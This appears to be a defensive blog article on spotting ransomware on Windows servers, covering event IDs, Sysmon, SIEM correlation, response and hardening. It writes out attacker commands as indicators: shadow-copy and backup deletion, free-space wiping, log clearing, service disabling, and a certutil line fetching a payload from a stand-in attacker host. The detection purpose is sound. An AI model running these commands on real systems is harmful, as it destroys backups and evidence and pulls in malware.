Signs of Ransomware Infection on Windows Servers: Critical Symptoms to Monitor

AISigns of Ransomware Infection on Windows Servers: Critical Symptoms to Monitor

Most admins wait until files are encrypted — that’s when the real damage is done.
Ransomware on Windows servers usually leaves clear warning signs hours before encryption starts.
Unexpected service stops, deleted shadow copies, spikes in CPU or disk I/O, mass file renames, ransom-note drops, and odd PowerShell or process chains are common early clues.
This post shows the critical symptoms to monitor, where to find them in Event and Sysmon logs, and what to check first so you can act before backups and files are lost.

Immediate Warning Indicators of Ransomware Activity on Windows Servers

2nD2-mZ2T_mFIMOnfMfU5w

Ransomware doesn’t just show up and start encrypting. It leaves tracks.

Before encryption starts, you’ll see service changes, log tampering, and resource spikes that look nothing like normal operations. Most attacks sprint from initial access to full encryption in under 12 hours. Your best chance to stop them? Catch the warning signs before files start getting locked.

Critical services start failing first. Attackers kill antivirus agents, EDR tools, and backup software using taskkill.exe, net stop, or sc.exe. Windows Event Logs capture this through Event ID 7036 (service state changes) and Event ID 7040 (start type flipped from Automatic to Disabled). Process creation events under Event ID 4688 show when taskkill.exe or sc.exe commands fire, especially when they’re spawned by PowerShell or cmd.exe parent processes.

Then you’ll see resource consumption go sideways. CPU usage stays high for no reason. Disk I/O spikes without explanation. File system changes pile up fast: ransom notes like README.txt or HOWTODECRYPT.html appear everywhere, files suddenly wear new extensions like .locked or .encrypt, and access errors spread across shares. You might also find missing Windows logs, deleted shadow copies, or unexpected reboots linked to boot configuration changes.

Eight immediate warning indicators worth watching:

  • Security, backup, or recovery services stopped or set to Disabled without authorization
  • Volume Shadow Copy snapshots or Windows restore points deleted or modified
  • CPU or disk I/O running well above baseline across multiple servers
  • Large numbers of files renamed with matching new extensions or replaced with garbage data
  • Ransom note text files or HTML documents showing up in user directories or shared folders
  • Security, Application, or System event logs disappearing or SIEM log volume dropping suddenly
  • Commands in process logs invoking vssadmin.exe, cipher.exe, wevtutil.exe, fsutil.exe, or taskkill.exe
  • Boot configuration changes or unexpected startup failures after reboots

Windows Server Service Tampering and Backup Destruction Indicators

peC75_DKQveVveHFAQce-w

Ransomware operators go after protective services before they deploy encryption. Security software, endpoint detection, and backup applications sit at the top of the target list.

Attackers use native Windows utilities to kill processes, stop services, and tweak registry keys that control startup behavior. Net stop commands can halt services without needing console access. Sc.exe changes a service to Disabled in the registry so it won’t restart automatically.

Backup destruction follows a script. Attackers delete Volume Shadow Copy snapshots with vssadmin delete shadows /all /quiet to wipe Windows restore points. Some variants clear backup catalogs using wbadmin delete backup or overwrite deleted files with cipher.exe /w to kill forensic recovery options. Lockbit 2.0 deletes both shadow copies and Windows Event Logs as part of its pre-encryption routine. Tools like fsutil.exe set file attributes or resize logs, and wevtutil.exe clears event channels. Each action leaves traces in Security and System logs before the logs themselves get wiped.

Command/Artifact What It Indicates Log/Event to Check
taskkill.exe /F /IM <process> Forcibly terminating security or backup processes Security Event ID 4688 (process creation); command-line arguments visible in Sysmon Event ID 1
vssadmin delete shadows /all /quiet Deleting all Volume Shadow Copy restore points to block recovery System Event Log (VSS, VolSnap); Application Log VSS errors; Sysmon Event ID 1
sc.exe config <service> start= disabled Changing service startup type to prevent automatic restart System Event ID 7040 (start type changed); Event ID 7036 (service stopped)
cipher.exe /w:C:\ Overwriting free disk space to prevent forensic recovery of deleted files Security Event ID 4688; high disk I/O with no corresponding user activity
wevtutil.exe cl System Clearing the System event log to hide evidence Security Event ID 1102 (audit log cleared); missing time ranges in SIEM

File Modification and Encryption Artifacts on Compromised Windows Servers

D_Cpyf1yQd2s5E3IBhOWQw

Encryption leaves obvious fingerprints on the file system.

Ransomware slaps uniform extensions onto huge numbers of files in minutes. Documents, databases, and VM images turn into junk data. Common extension patterns include .locked, .crypt, .encrypt, .crypted, and vendor tags like .lockbit. Files open as gibberish or binary garbage. Administrators trying to access shares get permission denied errors even when credentials still work, because the encryption process locks file handles.

Attackers sometimes run test encryptions on a small file set to verify the payload works before going all in. These test runs might hit only a few files in one directory or a couple of shares. Once validated, the full run targets business-critical directories like C:\Users, database paths, and network file shares, while usually avoiding C:\Windows and system directories to keep the server running enough to display ransom instructions.

Ransom notes drop as new text, HTML, or image files into every encrypted directory. Typical filenames: README.txt, HOWTODECRYPT.html, RECOVER-FILES.txt, or variations on that theme. These files contain payment instructions, attacker contact info, and unique victim IDs.

File system anomalies administrators should catch include sudden bursts of modification events across multiple directories, often thousands within minutes. Shared folders show simultaneous access and write operations from single user or service accounts. File metadata shows rapid timestamp changes and size shifts as encryption swaps plaintext for ciphertext. Filesystem audit logs record hundreds or thousands of file writes in tight succession. Backup jobs fail with errors saying files are locked or in use. Users report that documents they could open yesterday now throw errors or display unreadable content.

Six typical file system anomalies to detect:

  • Thousands of file rename operations in a short window across one or more servers or shares
  • Uniform file extension additions that weren’t there before (every .xlsx file suddenly becomes .xlsx.encrypt)
  • Identically named text or HTML files (ransom notes) appearing in many directories at once
  • Locked or inaccessible file handles blocking legitimate read or write operations by users and backup agents
  • File content replaced with binary or random-looking data when spot-checked
  • Failed backup jobs reporting file-in-use errors or unexpected increases in modified-file counts during backup windows

Suspicious Processes, PowerShell Abuse, and Unauthorized Scheduled Tasks

0D4BvUVJQsOVXxMtUHTYNA

Ransomware execution builds on process chains that spawn encryption binaries, kill defenses, and establish persistence.

Attackers love PowerShell with encoded command-line arguments to download payloads, execute scripts in memory, or invoke WMI for lateral movement. These commands show up as long base64 strings in process creation logs. Parent-child process relationships reveal weird sequences: rundll32.exe launching certutil.exe or powershell.exe, or Office apps spawning cmd.exe and wscript.exe. Credential-dumping tools like Mimikatz pull passwords from memory, and Cobalt Strike beacons set up command-and-control channels. Malicious scheduled tasks created via Event IDs 4698 and 4699 provide persistence, making sure payloads re-execute after reboot or detection cleanup.

Windows Event ID 4688 records every new process along with the full command line when auditing is enabled. Security teams must enable command-line logging in Group Policy under Computer Configuration > Administrative Templates > System > Audit Process Creation to capture arguments. Without this setting, 4688 events log only the process name, leaving out critical context like encoded PowerShell parameters or command switches. Sysmon Event ID 1 provides richer telemetry: process GUID, parent process GUID, and hashes, making it easier to trace execution lineage and identify obfuscated binaries.

Process Event Monitoring

Event ID 4688 and Sysmon logs expose malicious execution patterns. When powershell.exe appears with the -EncodedCommand or -Enc flag, analysts should decode the base64 string to inspect the actual script. Common obfuscation includes multiple layers of base64 encoding, concatenated strings, and environment-variable injection.

Attackers also abuse legitimate Windows utilities. Certutil.exe downloads payloads (certutil -urlcache -split -f http://attacker.com/payload.exe). Bitsadmin.exe transfers files quietly. Scheduled task abuse shows up in Event IDs 4698, 4699, and 4700 (tasks created, modified, or deleted). Tasks that execute PowerShell scripts, run at system startup, or trigger on user logon need immediate investigation.

Credential-dumping indicators include processes accessing LSASS.exe memory, execution of ProcDump.exe or Process Explorer targeting lsass.exe, or detection of known Mimikatz modules in memory. EDR tools flag these actions, but Windows native logs also capture LSASS access attempts through Security Event ID 4656 and 4663 when object-level auditing is configured for the lsass.exe process.

Network Traffic and Lateral Movement Signs Linked to Ransomware

5wyvJt5ASQmA1xQs2jKg_w

Network behavior shifts signal ransomware spreading across servers and getting ready to encrypt.

Elevated SMB traffic between internal hosts, especially outside normal backup windows, means attackers are enumerating shares or copying encryption binaries to more servers. Outbound connections to unfamiliar IP addresses or newly registered domains suggest command-and-control communication. Attackers use tools like Advanced Port Scanner and AngryIP Scanner to map internal networks, and Active Directory recon utilities like BloodHound, SharpHound, and ADFind to identify high-value targets and privilege escalation paths. Persistent beaconing traffic (a server contacting the same external IP at regular intervals) often reveals Cobalt Strike or similar frameworks maintaining remote access.

RDP brute-force attempts appear in Security Event Log as repeated Event ID 4625 entries for failed logons, followed by successful Event ID 4624 logons once credentials are cracked. Lateral movement leaves traces in Event ID 4624 Type 3 logons (network logon) and Type 10 logons (RemoteInteractive via RDP). Sudden logon activity from service accounts or admin accounts across multiple servers within minutes signals credential reuse or pass-the-hash attacks. DNS query spikes or requests for unusual domains, especially those with short TTLs or recent registration dates, indicate malware reaching out to infrastructure set up for the attack.

  • Abnormal increases in SMB/TCP 445 traffic volume between internal servers or from workstations to file servers
  • Outbound HTTPS or HTTP connections to IP addresses not in the organization’s typical traffic profile
  • DNS queries for newly registered domains, domains with short time-to-live values, or TOR exit node addresses
  • Multiple failed RDP logon attempts followed by successful logons from the same source IP or account
  • Process creation events for network scanning tools or Active Directory enumeration utilities on servers that don’t typically run such software

Log File Tampering, Audit Deletion, and Evasion Indicators on Windows Servers

eTnGQIzaRf2P8VJ9mj02kw

Attackers erase forensic evidence by clearing or deleting Windows Event Logs.

Event ID 1102 appears in the Security log when an administrator or attacker clears the audit log, recording the account name responsible. But if attackers delete log files directly from the file system or use wevtutil.exe to clear multiple channels at once, the 1102 event may not get recorded. Tools like cipher.exe overwrite deleted log files, and fsutil.exe manipulates file system metadata. Lockbit 2.0 deletes Security, Application, and System logs as part of its payload, leaving administrators without a detailed attack timeline.

Missing logs show up as gaps in SIEM ingestion. A server that normally sends thousands of events per hour suddenly drops to zero, or timestamps show missing time ranges. Security Operations Center teams should alert on log-volume anomalies: fewer than X events received from a critical server within a rolling one-hour window. File-system auditing on the log directory (C:\Windows\System32\winevt\Logs) can generate Event ID 4663 when log files are deleted or modified, providing a secondary detection layer even if the logs themselves are destroyed.

Registry persistence keys and unauthorized modifications to audit policies also indicate tampering. Attackers may disable specific audit categories via Group Policy or registry changes, turning off process creation auditing, logon auditing, or object access auditing. Event ID 4719 records changes to system audit policy. Administrators should review HKLM\SYSTEM\CurrentControlSet\Services\EventLog for unexpected changes to log file sizes or retention policies. Event ID 5145 logs network share access, useful for tracking lateral movement and file share enumeration, but attackers may disable this auditing or filter it out. Any unexplained reduction in audit event generation should trigger an investigation into whether the auditing itself got sabotaged.

Boot Configuration Manipulation and System Integrity Red Flags

HO-MAcZRdK15qIecNZ-FA

Some ransomware variants modify low-level system components to ensure execution or complicate recovery.

Redboot, identified in 2017, directly attacked the Master Boot Record and partition table, rendering the operating system unbootable and forcing victims to pay for restoration instructions. Modern ransomware may alter Boot Configuration Data using bcdedit.exe to disable startup repair, safe mode, or recovery options. Administrators discover these changes when servers fail to boot normally or display unexpected error messages during startup.

Master File Table corruption or unexpected MFT entry modifications can indicate ransomware manipulating file system structures. Locked desktop backgrounds, ransom messages displayed as wallpaper, or custom lock screens that replace the standard Windows logon interface are visual indicators of deep system compromise. Unexpected reboot cycles (servers restarting multiple times without administrator action) suggest ransomware payloads executing persistence mechanisms or attempting to disable security software before full encryption.

Integrity Issue What It Suggests
BCD settings changed to disable safe mode or startup repair Attacker preventing recovery options and forcing normal boot into compromised OS
Modified or corrupted MBR or partition table entries Low-level ransomware variant targeting boot sectors to render system unbootable
Desktop background replaced with ransom message or locked screen Ransomware payload executed successfully; encryption likely complete or in progress
Unexpected reboot cycles or failure to reach Windows logon Persistence mechanism or boot-time malware execution; possible drive encryption

Correlating Indicators Using SIEM, EDR, Sysmon, and Microsoft 365 Defender

XNExz8gnRSWLSs0JPAKiEQ

Single indicators in isolation might just be weird admin actions or system glitches. Effective detection combines multiple signals into high-confidence alerts.

A SIEM correlation rule that triggers when a single server generates a process creation event for vssadmin.exe, a service stop event for a backup agent, and a scheduled task creation event within a five-minute window produces a prioritized alert that demands immediate investigation. This approach cuts false positives and surfaces genuine ransomware activity before encryption spreads.

Microsoft 365 Defender advanced hunting uses Kusto Query Language to search process creation, file modification, and network connection tables. Queries identify command-line patterns like vssadmin delete shadows, sc.exe config commands, or encoded PowerShell execution. EDR platforms correlate process lineage, showing when a Microsoft Office application spawns PowerShell, which then downloads a suspicious executable and creates a scheduled task. File integrity monitoring flags mass file renames or extension changes, feeding alerts to the SIEM where they combine with network and authentication anomalies. Windows Event Forwarding centralizes logs from all servers to a collection host, making sure logs stay available even if attackers delete them locally.

Sysmon enhances Windows native logging with detailed process, network, and registry events. Event ID 1 captures process creation with full command-line arguments and parent process details. Event ID 3 logs network connections, revealing outbound C2 traffic. Event ID 7 records image loads, useful for detecting DLL injection or in-memory execution techniques. Event IDs 12 and 13 track registry changes, exposing persistence mechanisms. Deploying Sysmon across all servers with a tuned configuration and forwarding events to a SIEM creates a rich detection foundation. Threat intelligence feeds enrich SIEM data, tagging known-bad IP addresses, file hashes, and domain names associated with ransomware campaigns.

Key Logs and Telemetry to Prioritize

Security Event ID 4688 for process creation captures every executable launched, including command-line arguments when auditing is enabled. Without this, teams lose visibility into attacker command execution.

Sysmon Event IDs 1, 3, 7, 11, 12, and 13 provide process creation, network connections, image loads, file creation, registry creation, and registry value set events, forming a detailed behavioral baseline. System Event IDs 7036, 7040, and 7045 reveal service state changes, start type modifications, and new service installations (all critical for detecting defense evasion and persistence). Event IDs 4698, 4699, and 4700 in the Security log track scheduled task operations, a common persistence and execution vector. Volume Shadow Copy Service and VSS errors in the Application log signal backup destruction attempts. Network flow data from NetFlow or IDS logs captures lateral movement, scanning, and command-and-control traffic patterns that Windows logs alone can’t detect.

Immediate Response Steps When Ransomware Indicators Are Detected on Windows Servers

M4PVwJ-eQAKLxmx7sqblAA

Speed of response determines the scope of damage. When multiple ransomware indicators appear, act within 15 minutes.

Isolating compromised servers stops encryption from spreading to more hosts and limits data exfiltration. Disconnect network interfaces or place affected servers in a quarantine VLAN. Don’t power down servers immediately unless encryption is actively progressing, because volatile memory contains forensic evidence that’s lost on shutdown. Collect memory dumps using tools like DumpIt or FTK Imager, and export Windows Event Logs to external storage before any remediation steps.

Block known command-and-control IP addresses and domains at the perimeter firewall and on internal network segments. Disable or isolate user and service accounts showing signs of compromise, and reset passwords for privileged accounts from a known-clean system. Verify that offline or immutable backups exist and are uncorrupted before declaring recovery readiness. Use EDR to terminate suspicious processes, but preserve process memory for analysis. Coordinate with legal and communications teams if the incident requires external notification or involves regulated data.

  1. Isolate the affected server from the network by disabling network interfaces or placing it in a quarantine VLAN to stop lateral spread.
  2. Capture volatile evidence by collecting memory dumps and exporting Windows Event Logs, Sysmon logs, and EDR telemetry to secure external storage.
  3. Identify and block attacker infrastructure by adding known-bad IP addresses and domains to firewall deny lists and DNS sinkhole configurations.
  4. Disable compromised accounts and remove them from privileged groups, then reset passwords for service accounts and domain administrators from a clean workstation.
  5. Verify backup integrity by checking that offline or immutable backups are available and uncorrupted, following the 3-2-1 rule (3 copies, on 2 different media, 1 offsite).
  6. Terminate malicious processes using EDR or task manager, but capture process memory before killing to preserve forensic artifacts.
  7. Document the timeline of indicators, preserve evidence, and follow the organization’s incident-response runbook for escalation, containment, eradication, and recovery steps.

Hardening Windows Servers to Prevent Future Ransomware Indicators

Z760mPuDTfejCBpbT3z0Ww

Preventing ransomware takes layered defenses that reduce attack surface and speed up detection.

Identity hardening starts with enforcing multi-factor authentication on all privileged accounts, especially those with local administrator rights or domain admin membership. Restrict Remote Desktop Protocol access to jump servers or VPN-protected networks, and limit which accounts can log on via RDP using Group Policy. Disable local administrator accounts where possible, and enforce least-privilege principles so service accounts and user accounts can’t install software or modify system files. Rotate credentials regularly, and use managed service accounts or group managed service accounts for automated services to eliminate static passwords.

Network controls segment critical servers from user workstations and limit lateral movement. Internal firewalls and VLANs isolate file servers, database servers, and domain controllers. Disable SMBv1 across the environment and restrict SMB access to only necessary systems. Deploy network intrusion detection systems to monitor for scanning activity and unusual data transfers. Use application whitelisting or AppLocker policies to prevent unauthorized executables from running. Maintain an accurate inventory of all software and services running on each server, and remove unnecessary services to shrink the attack surface.

Continuous monitoring relies on centralized logging, correlation, and proactive threat hunting. Deploy Sysmon on every server with a configuration optimized for ransomware detection, and forward all logs to a SIEM or log aggregation platform. Create correlation rules that combine process creation, service changes, file modifications, and network anomalies into prioritized alerts. Conduct regular vulnerability scans and patch critical systems promptly. Place decoy files and honeypot shares on file servers to generate early alerts when attackers access fake data. Perform tabletop exercises and disaster recovery drills to validate incident-response procedures and ensure teams know how to restore from backups under pressure. Maintain offline or immutable backups that ransomware can’t delete, and test restoration procedures quarterly to confirm recovery time objectives remain achievable.

Final Words

You just walked through the concrete indicators of an active attack: services stopping, sudden CPU and disk spikes, new file extensions and ransom note files, deleted shadow copies, and missing logs.

We covered where these show up, like Event IDs (7036, 7040, 4688, 1102), Sysmon and EDR signals, and network clues, and what to do first: isolate, capture memory and logs, rotate creds, and block C2.

Keep watching for signs of ransomware infection on Windows servers, use SIEM and EDR to correlate alerts, and keep backups offline. With these checks in place, you’ll cut risk and recover faster.

FAQ

Q: What is the 3 2 1 rule for ransomware?

A: The 3-2-1 rule for ransomware is a backup strategy: keep 3 copies of data, on 2 different media, with 1 copy stored offline or offsite so you can recover after an attack.

Q: How to check for ransomware on Windows?

A: To check for ransomware on Windows, scan for high CPU/disk spikes, stopped security or backup services (Event IDs 7036/7040), ransom-note files or new extensions, missing logs, and suspicious process creations (Event ID 4688).

Q: What is the most indicative symptom of a ransomware infection?

A: The most indicative symptom of a ransomware infection is sudden mass file encryption—many files renamed or unreadable and ransom-note files appearing across local and shared folders.

Q: What are 5 must-do’s for surviving a ransomware attack?

A: The 5 must-do’s for surviving a ransomware attack are isolate affected hosts immediately, collect memory and logs, block attacker infrastructure, rotate privileged credentials, and restore from verified offline backups following the 3-2-1 rule.

Check out our other content

Check out other tags:

Most Popular Articles